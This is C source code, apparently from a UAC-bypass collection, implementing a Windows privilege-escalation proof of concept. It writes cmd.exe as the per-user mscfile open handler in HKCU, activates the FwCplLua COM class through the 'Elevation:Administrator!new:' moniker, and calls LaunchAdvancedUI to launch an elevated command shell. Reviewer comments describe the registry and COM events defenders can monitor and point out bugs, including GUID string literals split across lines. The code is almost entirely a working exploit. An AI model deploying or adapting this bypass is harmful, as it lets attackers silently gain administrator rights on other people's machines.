
UAC bypass using FwCplLua COM interface and HKCU mscfile registry entry hijack

/*
 * Hand-written C vtable layout for the IFwCplLua COM interface.
 *
 * Only the three IUnknown slots (QueryInterface/AddRef/Release) and the
 * final LaunchAdvancedUI slot are named; Method1..Method15 are unnamed
 * placeholders that exist purely to keep LaunchAdvancedUI at the correct
 * vtable index. In C a COM call is an indexed jump through this table, so
 * the number and order of these slots must match the real interface
 * exactly (that layout is not verifiable from this file).
 */
typedef struct
IFwCplLuaInterfaceVtbl
{

BEGIN_INTERFACE

/* IUnknown */
HRESULT(STDMETHODCALLTYPE *QueryInterface)(
__RPC__in IFwCplLua * This,
__RPC__in REFIID riid,
_COM_Outptr_ void **ppvObject);

ULONG(STDMETHODCALLTYPE *AddRef)(
__RPC__in IFwCplLua * This);

ULONG(STDMETHODCALLTYPE *Release)(
__RPC__in IFwCplLua * This);

/* Placeholder slots: never called here, present only for alignment of
 * the slot that follows them. */
HRESULT(STDMETHODCALLTYPE *Method1)(
__RPC__in IFwCplLua * This);

HRESULT(STDMETHODCALLTYPE *Method2)(
__RPC__in IFwCplLua * This);

HRESULT(STDMETHODCALLTYPE *Method3)(
__RPC__in IFwCplLua * This);

HRESULT(STDMETHODCALLTYPE *Method4)(
__RPC__in IFwCplLua * This);

HRESULT(STDMETHODCALLTYPE *Method5)(
__RPC__in IFwCplLua * This);
HRESULT(STDMETHODCALLTYPE *Method6)(
__RPC__in IFwCplLua * This);

HRESULT(STDMETHODCALLTYPE *Method7)(
__RPC__in IFwCplLua * This);

HRESULT(STDMETHODCALLTYPE *Method8)(
__RPC__in IFwCplLua * This);

HRESULT(STDMETHODCALLTYPE *Method9)(
__RPC__in IFwCplLua * This);

HRESULT(STDMETHODCALLTYPE *Method10)(
__RPC__in IFwCplLua * This);

HRESULT(STDMETHODCALLTYPE *Method11)(
__RPC__in IFwCplLua * This);

HRESULT(STDMETHODCALLTYPE *Method12)(
__RPC__in IFwCplLua * This);

HRESULT(STDMETHODCALLTYPE *Method13)(
__RPC__in IFwCplLua * This);

HRESULT(STDMETHODCALLTYPE *Method14)(
__RPC__in IFwCplLua * This);

HRESULT(STDMETHODCALLTYPE *Method15)(
__RPC__in IFwCplLua * This);

/* The only interface-specific method this file invokes. */
HRESULT(STDMETHODCALLTYPE *LaunchAdvancedUI)(
__RPC__in IFwCplLua * This);
END_INTERFACE

} *PIFwCplLuaInterfaceVtbl;

/* C-style COM object: a single pointer to the vtable declared above.
 * Methods are invoked as obj->lpVtbl->Name(obj). */
interface IFwCplLua
{
CONST_VTBL struct IFwCplLuaInterfaceVtbl *lpVtbl;
};

/* Wide-string GUIDs for the FwCplLua COM class (CLSID) and its interface
 * (IID). NOTE(review): the page extraction has split each literal across a
 * line break, which is not valid C; in the original source each #define is
 * a single line. Left byte-for-byte as extracted. */
#define T_CLSID_FwCplLua L"{752438CB-E941-


433F-BCB4-8B7D2329F0C8}"
#define T_IID_IFwCplLua L"{56DA8B35-7FC3-
45DF-8768-664147864573}"

/*
 * Proof-of-concept for the UAC bypass named in the page title: a per-user
 * (HKCU) "mscfile" handler hijack combined with activation of the FwCplLua
 * COM class through the COM elevation moniker.
 *
 * Defensive summary of what this function makes observable:
 *  - a write to HKCU\Software\Classes\mscfile\shell\open\command (the
 *    default value), which is never removed afterwards and therefore
 *    remains as a durable registry artifact;
 *  - an "Elevation:Administrator!new:<CLSID>" activation of the FwCplLua
 *    class via CoGetObject with CLSCTX_LOCAL_SERVER.
 *
 * @param lpszPayload  Declared but never read: the command written to the
 *                     registry is the hard-coded cmd.exe path below.
 * @return TRUE when the last HRESULT stored in r satisfies SUCCEEDED();
 *         FALSE on any earlier break (r stays E_FAIL) or on failure of
 *         LaunchAdvancedUI. Note that if CoGetObject returned a success
 *         code other than S_OK the loop would break before
 *         LaunchAdvancedUI, yet SUCCEEDED(r) would still report TRUE.
 */
BOOL Method42b_Test(
LPWSTR lpszPayload
)
{
HRESULT r = E_FAIL;
/* Always FALSE: the do/while runs exactly once and exists only so that
 * `break` can jump to the common cleanup below. */
BOOL bCond = FALSE;

LPWSTR lpBuffer = NULL;


/* Reg* APIs return LSTATUS (a LONG); LRESULT is the pointer-sized
 * window-procedure result type. Works, but is the wrong typedef. */
LRESULT lResult;
HKEY hKey = NULL;
SIZE_T sz = 0;

IID xIIDFwCplLua;
IFwCplLua *FwCplLua = NULL;
BIND_OPTS3 bop;

/* Holds the fixed command string; the literal is far shorter than MAX_PATH. */
WCHAR szBuffer[MAX_PATH + 1];


/* "Elevation:Administrator!new:" + a 38-character GUID string, well
 * within MAX_PATH. */
WCHAR szElevationMoniker[MAX_PATH];

do {
/* Parse the IID string into a GUID for the CoGetObject call. */
if (IIDFromString(T_IID_IFwCplLua, &xIIDFwCplLua) != S_OK)
{
break;
}

/* lpszPayload is ignored; the command is fixed here. */
_strcpy(szBuffer, L"C:\\windows\\system32\\cmd.exe");
lpBuffer = szBuffer;
sz = _strlen(lpBuffer);
if (sz == 0)
break;

/* Creates (or opens) the per-user mscfile open handler key. Because it
 * lives under HKCU no elevation is needed to write it; this is the
 * registry event a defender would monitor for. */
lResult = RegCreateKeyEx(HKEY_CURRENT_USER,
L"Software\\Classes\\mscfile\\shell\\open\\command",
0,
NULL,
REG_OPTION_NON_VOLATILE,
MAXIMUM_ALLOWED,
NULL,
&hKey,
NULL);

if (lResult != ERROR_SUCCESS)
break;

/* Byte length of the string including its NUL terminator, as REG_SZ
 * expects. */
sz = (1 + sz) * sizeof(WCHAR);
lResult = RegSetValueEx(
hKey,
TEXT(""),
0,
REG_SZ,
(BYTE*)lpBuffer,
(DWORD)sz);

if (lResult != ERROR_SUCCESS)
break;
/* Close now and clear the handle so the cleanup after the loop does not
 * close it a second time. */
RegCloseKey(hKey);
hKey = NULL;

/* Build the COM elevation moniker for the FwCplLua class. */
_strcpy(szElevationMoniker,
L"Elevation:Administrator!new:");
_strcat(szElevationMoniker, T_CLSID_FwCplLua);

/* Zero the bind options, then request an out-of-process server. */
RtlSecureZeroMemory(&bop, sizeof(bop));
bop.cbStruct = sizeof(bop);
bop.dwClassContext = CLSCTX_LOCAL_SERVER;

/* Activates the class through the elevation moniker; this is the second
 * observable event of the technique. */
r = CoGetObject(szElevationMoniker, (BIND_OPTS *)&bop,


&xIIDFwCplLua, &FwCplLua);
if (r != S_OK)
break;

if (FwCplLua == NULL) {
r = E_FAIL;
break;
}

/* Indexed vtable call; correctness depends on the slot layout declared
 * in IFwCplLuaInterfaceVtbl matching the real interface. */
r = FwCplLua->lpVtbl->LaunchAdvancedUI(FwCplLua);

} while (bCond);

/* Common cleanup reached by every `break` above. The registry value
 * written earlier is intentionally (or at least actually) not deleted. */
if (hKey != NULL)
RegCloseKey(hKey);

if (FwCplLua != NULL) {
FwCplLua->lpVtbl->Release(FwCplLua);
}

return SUCCEEDED(r);
}